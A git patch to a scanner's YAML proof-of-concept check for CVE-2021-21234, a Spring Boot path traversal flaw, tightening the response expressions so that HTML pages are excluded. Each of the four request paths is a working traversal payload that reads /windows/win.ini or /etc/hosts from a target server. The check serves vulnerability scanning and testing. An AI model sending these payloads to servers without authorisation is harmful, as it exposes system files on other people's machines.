From b8a591920b7c12e5a2e992bce7432a1320d91f04 Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Sun, 26 Jan 2025 22:02:59 +0800
Subject: [PATCH] Update springboot-cve-2021-21234.yml

Update springboot-cve-2021-21234.yml
---
 WebScan/pocs/springboot-cve-2021-21234.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/WebScan/pocs/springboot-cve-2021-21234.yml b/WebScan/pocs/springboot-cve-2021-21234.yml
index 6bf8103..d10f5fa 100644
--- a/WebScan/pocs/springboot-cve-2021-21234.yml
+++ b/WebScan/pocs/springboot-cve-2021-21234.yml
@@ -3,19 +3,19 @@ groups:
   spring1:
     - method: GET
       path: /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
-      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
+      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
   spring2:
     - method: GET
       path: /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
-      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts")
+      expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body.bcontains(b"fonts") && !response.body.bcontains(b"<html")
   spring3:
     - method: GET
       path: /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../
-      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
+      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
   spring4:
     - method: GET
       path: /log/view?filename=/etc/hosts&base=../../../../../../../../../../
-      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost")
+      expression: response.status == 200 && response.body.bcontains(b"127.0.0.1") && response.body.bcontains(b"localhost") && !response.body.bcontains(b"<html")
 detail:
   author: iak3ec(https://github.com/nu0l)
   links: